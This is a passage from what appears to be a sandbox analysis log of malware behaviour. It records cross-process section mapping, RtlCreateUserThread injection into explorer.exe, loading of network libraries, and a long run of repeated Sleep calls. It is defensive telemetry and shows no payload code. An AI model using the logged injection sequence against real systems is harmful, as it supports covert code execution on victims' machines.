ViewSize=0x18ed04*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x18ecfc*=0x4160000, SectionOffset=0x0, ViewSize=0x18ed04*=0x16000) returned 0x0 [0067.518] RtlCreateUserThread (in: ProcessHandle=0x128, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x4161a48, Parameter=0x2da0000, ThreadHandle=0x18ec40*=0x773abf0f77166c9a, ClientId=0x0 | out: ThreadHandle=0x18ec40*=0x138, ClientId=0x0) returned 0x0 [0067.519] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 2 os_tid = 0x974 Thread: id = 3 os_tid = 0x980 Thread: id = 42 os_tid = 0x980 Process: id = "2" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x7796000" os_pid = "0x45c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "1" os_parent_pid = "0x964" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4 os_tid = 0x984 Thread: id = 5 os_tid = 0x8b4 Thread: id = 6 os_tid = 0x894 Thread: id = 7 os_tid = 0x348 Thread: id = 8 os_tid = 0x5ac Thread: id = 9 os_tid = 0x560 Thread: id = 10 os_tid = 0x564 Thread: id = 11 os_tid = 0x580 Thread: id = 12 os_tid = 0x558 Thread: id = 13 os_tid = 0x538 Thread: id = 14 os_tid = 0x568 Thread: id = 15 os_tid = 0x540 Thread: id = 16 os_tid = 0x470 Thread: id = 17 os_tid = 0x46c Thread: id = 18 os_tid = 0x684 Thread: id = 19 os_tid = 0x654 Thread: id = 20 os_tid = 0x614 Thread: id = 21 os_tid = 0x60c Thread: id = 22 os_tid = 0x5d0 Thread: id = 23 os_tid = 0x57c Thread: id = 24 os_tid = 0x56c Thread: id = 25 os_tid = 0x554 Thread: id = 26 os_tid = 0x550 Thread: id = 27 os_tid = 0x54c Thread: id = 28 os_tid = 0x548 Thread: id = 29 os_tid = 0x544 Thread: id = 30 os_tid = 0x538 Thread: id = 31 os_tid = 0x530 Thread: id = 32 os_tid = 0x52c Thread: id = 33 os_tid = 0x528 Thread: id = 34 os_tid = 0x508 Thread: id = 35 os_tid = 0x4dc Thread: id = 36 os_tid = 0x4d0 Thread: id = 37 os_tid = 0x4c0 Thread: id = 38 os_tid = 0x4bc Thread: id = 39 os_tid = 0x4b8 Thread: id = 40 os_tid = 0x468 Thread: id = 41 os_tid = 0x460 Thread: id = 43 os_tid = 0xae0 [0071.247] LoadLibraryA (lpLibFileName="NTDLL") returned 0x76f50000 [0071.248] GetProcAddress (hModule=0x76f50000, lpProcName="RtlExitUserThread") returned 0x76f96930 [0071.249] GetProcessHeap () returned 0x2a0000 [0071.249] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x10) returned 0x2ba0ec0 [0071.249] LoadLibraryA (lpLibFileName="user32") returned 0x76d30000 [0071.250] GetProcessHeap () returned 0x2a0000 [0071.250] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2ba0ec0) returned 1 [0071.250] GetProcessHeap () returned 0x2a0000 [0071.250] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x12) returned 0x2ba0ec0 [0071.250] LoadLibraryA (lpLibFileName="advapi32") returned 0x7fefdbf0000 [0071.250] GetProcessHeap () returned 0x2a0000 [0071.250] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2ba0ec0) returned 1 [0071.250] GetProcessHeap () returned 0x2a0000 [0071.250] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x10) returned 0x2ba0ec0 [0071.250] LoadLibraryA (lpLibFileName="urlmon") returned 0x7fefd4b0000 [0071.251] GetProcessHeap () returned 0x2a0000 [0071.251] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2ba0ec0) returned 1 [0071.251] GetProcessHeap () returned 0x2a0000 [0071.251] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xf) returned 0x2ba0ec0 [0071.251] LoadLibraryA (lpLibFileName="ole32") returned 0x7fefe2b0000 [0071.251] GetProcessHeap () returned 0x2a0000 [0071.251] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2ba0ec0) returned 1 [0071.251] GetProcessHeap () returned 0x2a0000 [0071.251] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x11) returned 0x2ba0ec0 [0071.251] LoadLibraryA (lpLibFileName="winhttp") returned 0x7fef7150000 [0071.495] GetProcessHeap () returned 0x2a0000 [0071.495] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2ba0ec0) returned 1 [0071.495] GetProcessHeap () returned 0x2a0000 [0071.495] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x10) returned 0x2ba0ec0 [0071.495] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7fefe260000 [0071.496] GetProcessHeap () returned 0x2a0000 [0071.496] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2ba0ec0) returned 1 [0071.496] GetProcessHeap () returned 0x2a0000 [0071.496] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x10) returned 0x2ba0ec0 [0071.496] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7fefc5b0000 [0071.620] GetProcessHeap () returned 0x2a0000 [0071.620] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2ba0ec0) returned 1 [0071.620] GetProcessHeap () returned 0x2a0000 [0071.620] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x11) returned 0x2ba0ec0 [0071.620] LoadLibraryA (lpLibFileName="shell32") returned 0x7fefe4c0000 [0071.620] GetProcessHeap () returned 0x2a0000 [0071.620] RtlFreeHeap (HeapHandle=0x2a0000, Flags=0x0, BaseAddress=0x2ba0ec0) returned 1 [0071.621] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4163f2c, lpParameter=0x2da0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xaac [0071.622] CloseHandle (hObject=0xaac) returned 1 [0071.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4164008, lpParameter=0x2da0000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xaac [0071.622] CloseHandle (hObject=0xaac) returned 1 [0071.622] Sleep (dwMilliseconds=0xa) [0071.628] Sleep (dwMilliseconds=0xa) [0071.644] Sleep (dwMilliseconds=0xa) [0071.659] Sleep (dwMilliseconds=0xa) [0071.675] Sleep (dwMilliseconds=0xa) [0071.691] Sleep (dwMilliseconds=0xa) [0071.706] Sleep (dwMilliseconds=0xa) [0071.722] Sleep (dwMilliseconds=0xa) [0071.737] Sleep (dwMilliseconds=0xa) [0071.755] Sleep (dwMilliseconds=0xa) [0071.769] Sleep (dwMilliseconds=0xa) [0071.784] Sleep (dwMilliseconds=0xa) [0071.800] Sleep (dwMilliseconds=0xa) [0071.815] Sleep (dwMilliseconds=0xa) [0071.831] Sleep (dwMilliseconds=0xa) [0071.847] Sleep (dwMilliseconds=0xa) [0071.862] Sleep (dwMilliseconds=0xa) [0071.878] Sleep (dwMilliseconds=0xa) [0071.893] Sleep (dwMilliseconds=0xa) [0071.909] Sleep (dwMilliseconds=0xa) [0071.925] Sleep (dwMilliseconds=0xa) [0071.941] Sleep (dwMilliseconds=0xa) [0071.956] Sleep (dwMilliseconds=0xa) [0071.971] Sleep (dwMilliseconds=0xa) [0071.987] Sleep (dwMilliseconds=0xa) [0072.003] Sleep (dwMilliseconds=0xa) [0072.018] Sleep (dwMilliseconds=0xa) [0072.034] Sleep (dwMilliseconds=0xa) [0072.058] Sleep (dwMilliseconds=0xa) [0072.065] Sleep (dwMilliseconds=0xa) [0072.081] Sleep (dwMilliseconds=0xa) [0072.096] Sleep (dwMilliseconds=0xa) [0072.112] Sleep (dwMilliseconds=0xa) [0072.127] Sleep (dwMilliseconds=0xa) [0072.143] Sleep (dwMilliseconds=0xa) [0072.159] Sleep (dwMilliseconds=0xa) [0072.174] Sleep (dwMilliseconds=0xa) [0072.190] Sleep (dwMilliseconds=0xa) [0072.206] Sleep (dwMilliseconds=0xa) [0072.221] Sleep (dwMilliseconds=0xa) [0072.237] Sleep (dwMilliseconds=0xa) [0072.252] Sleep (dwMilliseconds=0xa) [0072.277] Sleep (dwMilliseconds=0xa) [0072.283] Sleep (dwMilliseconds=0xa) [0072.299] Sleep (dwMilliseconds=0xa) [0072.315] Sleep (dwMilliseconds=0xa) [0072.330] Sleep (dwMilliseconds=0xa) [0072.346] Sleep (dwMilliseconds=0xa) [0072.361] Sleep (dwMilliseconds=0xa) [0072.377] Sleep (dwMilliseconds=0xa) [0072.393] Sleep (dwMilliseconds=0xa) [0072.408] Sleep (dwMilliseconds=0xa) [0072.424] Sleep (dwMilliseconds=0xa) [0072.440] Sleep (dwMilliseconds=0xa) [0072.455] Sleep (dwMilliseconds=0xa) [0072.471] Sleep (dwMilliseconds=0xa) [0072.487] Sleep (dwMilliseconds=0xa) [0072.502] Sleep (dwMilliseconds=0xa) [0072.518] Sleep (dwMilliseconds=0xa) [0072.533] Sleep (dwMilliseconds=0xa) [0072.549] Sleep (dwMilliseconds=0xa) [0072.564] Sleep (dwMilliseconds=0xa) [0072.580] Sleep (dwMilliseconds=0xa) [0072.596] Sleep (dwMilliseconds=0xa) [0072.611] Sleep (dwMilliseconds=0xa) [0072.627] Sleep (dwMilliseconds=0xa) [0072.642] Sleep (dwMilliseconds=0xa) [0072.658] Sleep (dwMilliseconds=0xa) [0072.674] Sleep (dwMilliseconds=0xa) [0072.689] Sleep (dwMilliseconds=0xa) [0072.705] Sleep (dwMilliseconds=0xa) [0072.720] Sleep (dwMilliseconds=0xa) [0072.736] Sleep (dwMilliseconds=0xa) [0072.751] Sleep (dwMilliseconds=0xa) [0072.767] Sleep (dwMilliseconds=0xa) [0072.783] Sleep (dwMilliseconds=0xa) [0072.798] Sleep (dwMilliseconds=0xa) [0072.816] Sleep (dwMilliseconds=0xa) [0072.830] Sleep (dwMilliseconds=0xa) [0072.860] Sleep (dwMilliseconds=0xa) [0072.861] Sleep (dwMilliseconds=0xa) [0072.876] Sleep (dwMilliseconds=0xa) [0072.892] Sleep (dwMilliseconds=0xa) [0072.908] Sleep (dwMilliseconds=0xa) [0072.924] Sleep (dwMilliseconds=0xa) [0072.939] Sleep (dwMilliseconds=0xa) [0072.954] Sleep (dwMilliseconds=0xa) [0072.970] Sleep (dwMilliseconds=0xa) [0072.986] Sleep (dwMilliseconds=0xa) [0073.001] Sleep (dwMilliseconds=0xa) [0073.017] Sleep (dwMilliseconds=0xa) [0073.032] Sleep (dwMilliseconds=0xa) [0073.057] Sleep (dwMilliseconds=0xa) [0073.063] Sleep (dwMilliseconds=0xa) [0073.079] Sleep (dwMilliseconds=0xa) [0073.095] Sleep (dwMilliseconds=0xa) [0073.111] Sleep (dwMilliseconds=0xa) [0073.131] Sleep (dwMilliseconds=0xa) [0073.146] Sleep (dwMilliseconds=0xa) [0073.164] Sleep (dwMilliseconds=0xa) [0073.173] Sleep (dwMilliseconds=0xa) [0073.188] Sleep (dwMilliseconds=0xa) [0073.235] Sleep (dwMilliseconds=0xa) [0073.252] Sleep (dwMilliseconds=0xa) [0073.266] Sleep (dwMilliseconds=0xa) [0073.288] Sleep (dwMilliseconds=0xa) [0073.297] Sleep (dwMilliseconds=0xa) [0073.313] Sleep (dwMilliseconds=0xa) [0073.329] Sleep (dwMilliseconds=0xa) [0073.344] Sleep (dwMilliseconds=0xa) [0073.391] Sleep (dwMilliseconds=0xa) [0073.438] Sleep (dwMilliseconds=0xa) [0073.459] Sleep (dwMilliseconds=0xa) [0073.469] Sleep (dwMilliseconds=0xa) [0073.486] Sleep (dwMilliseconds=0xa) [0073.500] Sleep (dwMilliseconds=0xa) [0073.525] Sleep (dwMilliseconds=0xa) [0073.531] Sleep (dwMilliseconds=0xa) [0073.548] Sleep (dwMilliseconds=0xa) [0073.563] Sleep (dwMilliseconds=0xa) [0073.578] Sleep (dwMilliseconds=0xa) [0073.594] Sleep (dwMilliseconds=0xa) [0073.609] Sleep (dwMilliseconds=0xa) [0073.625] Sleep (dwMilliseconds=0xa) [0073.641] Sleep (dwMilliseconds=0xa) [0073.656] Sleep (dwMilliseconds=0xa) [0073.672] Sleep (dwMilliseconds=0xa) [0073.688] Sleep (dwMilliseconds=0xa) [0073.703] Sleep (dwMilliseconds=0xa) [0073.719] Sleep (dwMilliseconds=0xa) [0073.734] Sleep (dwMilliseconds=0xa) [0073.750] Sleep (dwMilliseconds=0xa) [0073.766] Sleep (dwMilliseconds=0xa) [0073.781] Sleep (dwMilliseconds=0xa) [0073.797] Sleep (dwMilliseconds=0xa) [0073.812] Sleep (dwMilliseconds=0xa) [0073.828] Sleep (dwMilliseconds=0xa) [0073.843] Sleep (dwMilliseconds=0xa) [0073.859] Sleep (dwMilliseconds=0xa) [0073.875] Sleep (dwMilliseconds=0xa) [0073.890] Sleep (dwMilliseconds=0xa) [0073.906] Sleep (dwMilliseconds=0xa) [0073.922] Sleep (dwMilliseconds=0xa) [0073.937] Sleep (dwMilliseconds=0xa) [0073.953] Sleep (dwMilliseconds=0xa) [0073.969] Sleep (dwMilliseconds=0xa) [0073.984] Sleep (dwMilliseconds=0xa) [0073.999] Sleep (dwMilliseconds=0xa) [0074.015] Sleep (dwMilliseconds=0xa) [0074.031] Sleep (dwMilliseconds=0xa) [0074.056] Sleep (dwMilliseconds=0xa) [0074.062] Sleep (dwMilliseconds=0xa) [0074.077] Sleep (dwMilliseconds=0xa) [0074.093] Sleep (dwMilliseconds=0xa) [0074.109] Sleep (dwMilliseconds=0xa) [0074.124] Sleep (dwMilliseconds=0xa) [0074.140] Sleep (dwMilliseconds=0xa) [0074.156] Sleep (dwMilliseconds=0xa) [0074.171] Sleep (dwMilliseconds=0xa) [0074.190] Sleep (dwMilliseconds=0xa) [0074.202] Sleep (dwMilliseconds=0xa) [0074.218] Sleep (dwMilliseconds=0xa) [0074.233] Sleep (dwMilliseconds=0xa) [0074.249] Sleep (dwMilliseconds=0xa) [0074.265] Sleep (dwMilliseconds=0xa) [0074.280] Sleep (dwMilliseconds=0xa) [0074.296] Sleep (dwMilliseconds=0xa) [0074.312] Sleep (dwMilliseconds=0xa) [0074.327] Sleep (dwMilliseconds=0xa) [0074.346] Sleep (dwMilliseconds=0xa) [0074.358] Sleep (dwMilliseconds=0xa) [0074.374] Sleep (dwMilliseconds=0xa) [0074.389] Sleep (dwMilliseconds=0xa) [0074.405] Sleep (dwMilliseconds=0xa) [0074.421] Sleep (dwMilliseconds=0xa) [0074.437] Sleep (dwMilliseconds=0xa) [0074.452] Sleep (dwMilliseconds=0xa) [0074.467] Sleep (dwMilliseconds=0xa) [0074.483] Sleep (dwMilliseconds=0xa) [0074.499] Sleep (dwMilliseconds=0xa) [0074.515] Sleep (dwMilliseconds=0xa) [0074.530] Sleep (dwMilliseconds=0xa) [0075.095] Sleep (dwMilliseconds=0xa) [0075.107] Sleep (dwMilliseconds=0xa) [0075.124] Sleep (dwMilliseconds=0xa) [0075.138] Sleep (dwMilliseconds=0xa) [0075.156] Sleep (dwMilliseconds=0xa) [0075.170] Sleep (dwMilliseconds=0xa) [0075.185] Sleep (dwMilliseconds=0xa) [0075.201] Sleep (dwMilliseconds=0xa) [0075.216] Sleep (dwMilliseconds=0xa) [0075.235] Sleep (dwMilliseconds=0xa) [0075.247] Sleep (dwMilliseconds=0xa) [0075.264] Sleep (dwMilliseconds=0xa) [0075.279] Sleep (dwMilliseconds=0xa) [0075.297] Sleep (dwMilliseconds=0xa) [0075.310] Sleep (dwMilliseconds=0xa) [0075.326] Sleep (dwMilliseconds=0xa) [0075.341] Sleep (dwMilliseconds=0xa) [0075.357] Sleep (dwMilliseconds=0xa) [0075.372] Sleep (dwMilliseconds=0xa) [0075.392] Sleep (dwMilliseconds=0xa) [0075.425] Sleep (dwMilliseconds=0xa) [0075.435] Sleep (dwMilliseconds=0xa) [0075.462] Sleep (dwMilliseconds=0xa) [0075.468] Sleep (dwMilliseconds=0xa) [0075.488] Sleep (dwMilliseconds=0xa) [0075.498] Sleep (dwMilliseconds=0xa) [0075.513] Sleep (dwMilliseconds=0xa) [0075.528] Sleep (dwMilliseconds=0xa) [0075.544] Sleep (dwMilliseconds=0xa) [0075.560] Sleep (dwMilliseconds=0xa) [0075.580] Sleep (dwMilliseconds=0xa) [0075.599] Sleep (dwMilliseconds=0xa) [0075.606] Sleep (dwMilliseconds=0xa) [0075.622] Sleep (dwMilliseconds=0xa) [0075.638] Sleep (dwMilliseconds=0xa) [0075.653] Sleep (dwMilliseconds=0xa) [0075.669] Sleep (dwMilliseconds=0xa) [0075.684] Sleep (dwMilliseconds=0xa) [0075.705] Sleep (dwMilliseconds=0xa) [0075.716] Sleep (dwMilliseconds=0xa) [0075.731] Sleep (dwMilliseconds=0xa) [0075.750] Sleep (dwMilliseconds=0xa) [0075.762] Sleep (dwMilliseconds=0xa) [0075.778] Sleep (dwMilliseconds=0xa) [0075.793] Sleep (dwMilliseconds=0xa) [0075.811] Sleep (dwMilliseconds=0xa) [0075.830] Sleep (dwMilliseconds=0xa) [0075.840] Sleep (dwMilliseconds=0xa) [0075.856] Sleep (dwMilliseconds=0xa) [0075.872] Sleep (dwMilliseconds=0xa) [0075.887] Sleep (dwMilliseconds=0xa) [0075.903] Sleep (dwMilliseconds=0xa) [0075.918] Sleep (dwMilliseconds=0xa) [0075.934] Sleep (dwMilliseconds=0xa) [0075.954] Sleep (dwMilliseconds=0xa) [0075.965] Sleep (dwMilliseconds=0xa) [0075.981] Sleep (dwMilliseconds=0xa) [0075.997] Sleep (dwMilliseconds=0xa) [0076.012] Sleep (dwMilliseconds=0xa) [0076.028] Sleep (dwMilliseconds=0xa) [0076.043] Sleep (dwMilliseconds=0xa) [0076.059] Sleep (dwMilliseconds=0xa) [0076.080] Sleep (dwMilliseconds=0xa) [0076.090] Sleep (dwMilliseconds=0xa) [0076.105] Sleep (dwMilliseconds=0xa) [0076.121] Sleep (dwMilliseconds=0xa) [0076.138] Sleep (dwMilliseconds=0xa) [0076.152] Sleep (dwMilliseconds=0xa) [0076.168] Sleep (dwMilliseconds=0xa) [0076.184] Sleep (dwMilliseconds=0xa) [0076.204] Sleep (dwMilliseconds=0xa) [0076.215] Sleep (dwMilliseconds=0xa) [0076.230] Sleep (dwMilliseconds=0xa) [0076.246] Sleep (dwMilliseconds=0xa) [0076.261] Sleep (dwMilliseconds=0xa) [0076.277] Sleep (dwMilliseconds=0xa) [0076.293] Sleep (dwMilliseconds=0xa) [0076.308] Sleep (dwMilliseconds=0xa) [0076.328] Sleep (dwMilliseconds=0xa) [0076.348] Sleep (dwMilliseconds=0xa) [0076.355] Sleep (dwMilliseconds=0xa) [0076.371] Sleep (dwMilliseconds=0xa) [0076.386] Sleep (dwMilliseconds=0xa) [0076.402] Sleep (dwMilliseconds=0xa) [0076.417] Sleep (dwMilliseconds=0xa) [0076.433] Sleep (dwMilliseconds=0xa) [0076.454] Sleep (dwMilliseconds=0xa) [0076.464] Sleep (dwMilliseconds=0xa) [0076.480] Sleep (dwMilliseconds=0xa) [0076.496] Sleep (dwMilliseconds=0xa) [0076.514] Sleep (dwMilliseconds=0xa) [0076.534] Sleep (dwMilliseconds=0xa) [0076.561] Sleep (dwMilliseconds=0xa) [0076.603] Sleep (dwMilliseconds=0xa) [0076.611] Sleep (dwMilliseconds=0xa) [0076.627] Sleep (dwMilliseconds=0xa) [0076.636] Sleep (dwMilliseconds=0xa) [0076.651] Sleep (dwMilliseconds=0xa) [0076.667] Sleep (dwMilliseconds=0xa) [0076.683] Sleep (dwMilliseconds=0xa) [0076.703] Sleep (dwMilliseconds=0xa) [0076.714] Sleep (dwMilliseconds=0xa) [0076.729] Sleep (dwMilliseconds=0xa) [0076.745] Sleep (dwMilliseconds=0xa) [0076.761] Sleep (dwMilliseconds=0xa) [0076.776] Sleep (dwMilliseconds=0xa) [0076.792] Sleep (dwMilliseconds=0xa) [0076.808] Sleep (dwMilliseconds=0xa) [0076.828] Sleep (dwMilliseconds=0xa) [0076.839] Sleep (dwMilliseconds=0xa) [0076.854] Sleep (dwMilliseconds=0xa) [0076.870] Sleep (dwMilliseconds=0xa) [0076.886] Sleep (dwMilliseconds=0xa) [0076.901] Sleep (dwMilliseconds=0xa) [0076.919] Sleep (dwMilliseconds=0xa) [0076.932] Sleep (dwMilliseconds=0xa) [0076.953] Sleep (dwMilliseconds=0xa) [0076.963] Sleep (dwMilliseconds=0xa) [0076.979] Sleep (dwMilliseconds=0xa) [0076.997] Sleep (dwMilliseconds=0xa) [0077.051] Sleep (dwMilliseconds=0xa) [0077.057] Sleep (dwMilliseconds=0xa) [0077.078] Sleep (dwMilliseconds=0xa) [0077.088] Sleep (dwMilliseconds=0xa) [0077.105] Sleep (dwMilliseconds=0xa) [0077.120] Sleep (dwMilliseconds=0xa) [0077.135] Sleep (dwMilliseconds=0xa) [0077.151] Sleep (dwMilliseconds=0xa) [0077.166] Sleep (dwMilliseconds=0xa) [0077.182] Sleep (dwMilliseconds=0xa) [0077.203] Sleep (dwMilliseconds=0xa) [0077.213] Sleep (dwMilliseconds=0xa) [0077.229] Sleep (dwMilliseconds=0xa) [0077.247] Sleep (dwMilliseconds=0xa) [0077.260] Sleep (dwMilliseconds=0xa) [0077.275] Sleep (dwMilliseconds=0xa) [0077.291] Sleep (dwMilliseconds=0xa) [0077.307] Sleep (dwMilliseconds=0xa) [0077.327] Sleep (dwMilliseconds=0xa) [0077.338] Sleep (dwMilliseconds=0xa) [0077.354] Sleep (dwMilliseconds=0xa) [0077.369] Sleep (dwMilliseconds=0xa) [0077.385] Sleep (dwMilliseconds=0xa) [0077.400] Sleep (dwMilliseconds=0xa) [0077.424] Sleep (dwMilliseconds=0xa) [0077.432] Sleep (dwMilliseconds=0xa) [0077.452] Sleep (dwMilliseconds=0xa) [0077.463] Sleep (dwMilliseconds=0xa) [0077.478] Sleep (dwMilliseconds=0xa) [0077.494] Sleep (dwMilliseconds=0xa) [0077.509] Sleep (dwMilliseconds=0xa) [0077.525] Sleep (dwMilliseconds=0xa) [0077.541] Sleep (dwMilliseconds=0xa) [0077.556] Sleep (dwMilliseconds=0xa) [0077.577] Sleep (dwMilliseconds=0xa) [0077.596] Sleep (dwMilliseconds=0xa) [0077.603] Sleep (dwMilliseconds=0xa) [0077.619] Sleep (dwMilliseconds=0xa) [0077.636] Sleep (dwMilliseconds=0xa) [0077.650] Sleep (dwMilliseconds=0xa) [0077.665] Sleep (dwMilliseconds=0xa) [0077.681] Sleep (dwMilliseconds=0xa) [0077.701] Sleep (dwMilliseconds=0xa) [0077.725] Sleep (dwMilliseconds=0xa) [0077.728] Sleep (dwMilliseconds=0xa) [0077.744] Sleep (dwMilliseconds=0xa) [0077.759] Sleep (dwMilliseconds=0xa) [0077.775] Sleep (dwMilliseconds=0xa) [0077.790] Sleep (dwMilliseconds=0xa) [0077.806] Sleep (dwMilliseconds=0xa) [0077.832] Sleep (dwMilliseconds=0xa) [0077.837] Sleep (dwMilliseconds=0xa) [0077.853] Sleep (dwMilliseconds=0xa) [0077.868] Sleep (dwMilliseconds=0xa) [0077.884] Sleep (dwMilliseconds=0xa) [0077.899] Sleep (dwMilliseconds=0xa) [0077.915] Sleep (dwMilliseconds=0xa) [0077.931] Sleep (dwMilliseconds=0xa) [0077.952] Sleep (dwMilliseconds=0xa) [0077.962] Sleep (dwMilliseconds=0xa) [0077.977] Sleep (dwMilliseconds=0xa) [0077.993] Sleep (dwMilliseconds=0xa) [0078.009] Sleep (dwMilliseconds=0xa) [0078.026] Sleep (dwMilliseconds=0xa) [0078.040] Sleep (dwMilliseconds=0xa) [0078.056] Sleep (dwMilliseconds=0xa) [0078.077] Sleep (dwMilliseconds=0xa) [0078.087] Sleep (dwMilliseconds=0xa) [0078.103] Sleep (dwMilliseconds=0xa) [0078.118] Sleep (dwMilliseconds=0xa) [0078.133] Sleep (dwMilliseconds=0xa) [0078.149] Sleep (dwMilliseconds=0xa) [0078.165] Sleep (dwMilliseconds=0xa) [0078.181] Sleep (dwMilliseconds=0xa) [0078.201] Sleep (dwMilliseconds=0xa) [0078.211] Sleep (dwMilliseconds=0xa) [0078.227] Sleep (dwMilliseconds=0xa) [0078.243] Sleep (dwMilliseconds=0xa) [0078.260] Sleep (dwMilliseconds=0xa) [0078.274] Sleep (dwMilliseconds=0xa) [0078.290] Sleep (dwMilliseconds=0xa) [0078.305] Sleep (dwMilliseconds=0xa) [0078.325] Sleep (dwMilliseconds=0xa) [0078.336] Sleep (dwMilliseconds=0xa) [0078.353] Sleep (dwMilliseconds=0xa) [0078.368] Sleep (dwMilliseconds=0xa) [0078.383] Sleep (dwMilliseconds=0xa) [0078.399] Sleep (dwMilliseconds=0xa) [0078.414] Sleep (dwMilliseconds=0xa) [0078.430] Sleep (dwMilliseconds=0xa) [0078.450] Sleep (dwMilliseconds=0xa) [0078.461] Sleep (dwMilliseconds=0xa) [0078.477] Sleep (dwMilliseconds=0xa) [0078.492] Sleep (dwMilliseconds=0xa) [0078.516] Sleep (dwMilliseconds=0xa) [0078.523] Sleep (dwMilliseconds=0xa) [0078.539] Sleep (dwMilliseconds=0xa) [0078.555] Sleep (dwMilliseconds=0xa) [0078.575] Sleep (dwMilliseconds=0xa) [0078.598] Sleep (dwMilliseconds=0xa) [0078.601] Sleep (dwMilliseconds=0xa) [0078.617] Sleep (dwMilliseconds=0xa) [0078.633] Sleep (dwMilliseconds=0xa) [0078.648] Sleep (dwMilliseconds=0xa) [0078.664] Sleep (dwMilliseconds=0xa) [0078.680] Sleep (dwMilliseconds=0xa) [0078.700] Sleep (dwMilliseconds=0xa) [0078.711] Sleep (dwMilliseconds=0xa) [0078.726] Sleep (dwMilliseconds=0xa) [0078.743] Sleep (dwMilliseconds=0xa) [0078.757] Sleep (dwMilliseconds=0xa) [0078.773] Sleep (dwMilliseconds=0xa) [0078.789] Sleep (dwMilliseconds=0xa) [0078.804] Sleep (dwMilliseconds=0xa) [0078.824] Sleep (dwMilliseconds=0xa) [0078.836] Sleep (dwMilliseconds=0xa) [0078.851] Sleep (dwMilliseconds=0xa) [0078.867] Sleep (dwMilliseconds=0xa) [0078.882] Sleep (dwMilliseconds=0xa) [0078.898] Sleep (dwMilliseconds=0xa) [0078.913] Sleep (dwMilliseconds=0xa) [0078.930] Sleep (dwMilliseconds=0xa) [0078.950] Sleep (dwMilliseconds=0xa) [0078.960] Sleep (dwMilliseconds=0xa) [0078.976] Sleep (dwMilliseconds=0xa) [0078.992] Sleep (dwMilliseconds=0xa) [0079.007] Sleep (dwMilliseconds=0xa) [0079.023] Sleep (dwMilliseconds=0xa) [0079.038] Sleep (dwMilliseconds=0xa) [0079.054] Sleep (dwMilliseconds=0xa) [0079.074] Sleep (dwMilliseconds=0xa) [0079.085] Sleep (dwMilliseconds=0xa) [0079.101] Sleep (dwMilliseconds=0xa) [0079.116] Sleep (dwMilliseconds=0xa) [0079.133] Sleep (dwMilliseconds=0xa) [0079.147] Sleep (dwMilliseconds=0xa) [0079.163] Sleep (dwMilliseconds=0xa) [0079.179] Sleep (dwMilliseconds=0xa) [0079.201] Sleep (dwMilliseconds=0xa) [0079.210] Sleep (dwMilliseconds=0xa) [0079.225] Sleep (dwMilliseconds=0xa) [0079.242] Sleep (dwMilliseconds=0xa) [0079.257] Sleep (dwMilliseconds=0xa) [0079.272] Sleep (dwMilliseconds=0xa) [0079.288] Sleep (dwMilliseconds=0xa) [0079.304] Sleep (dwMilliseconds=0xa) [0079.323] Sleep (dwMilliseconds=0xa) [0079.335] Sleep (dwMilliseconds=0xa) [0079.350] Sleep (dwMilliseconds=0xa) [0079.367] Sleep (dwMilliseconds=0xa) [0079.382] Sleep (dwMilliseconds=0xa) [0079.397] Sleep (dwMilliseconds=0xa) [0079.413] Sleep (dwMilliseconds=0xa) [0079.428] Sleep (dwMilliseconds=0xa) [0079.448] Sleep (dwMilliseconds=0xa) [0079.459] Sleep (dwMilliseconds=0xa) [0079.475] Sleep (dwMilliseconds=0xa) [0079.491] Sleep (dwMilliseconds=0xa) [0079.506] Sleep (dwMilliseconds=0xa) [0079.531] Sleep (dwMilliseconds=0xa) [0079.537] Sleep (dwMilliseconds=0xa) [0079.553] Sleep (dwMilliseconds=0xa) [0079.573] Sleep (dwMilliseconds=0xa) [0079.593] Sleep (dwMilliseconds=0xa) [0079.600] Sleep (dwMilliseconds=0xa) [0079.616] Sleep (dwMilliseconds=0xa) [0079.631] Sleep (dwMilliseconds=0xa) [0079.647] Sleep (dwMilliseconds=0xa) [0079.662] Sleep (dwMilliseconds=0xa) [0079.678] Sleep (dwMilliseconds=0xa) [0079.698] Sleep 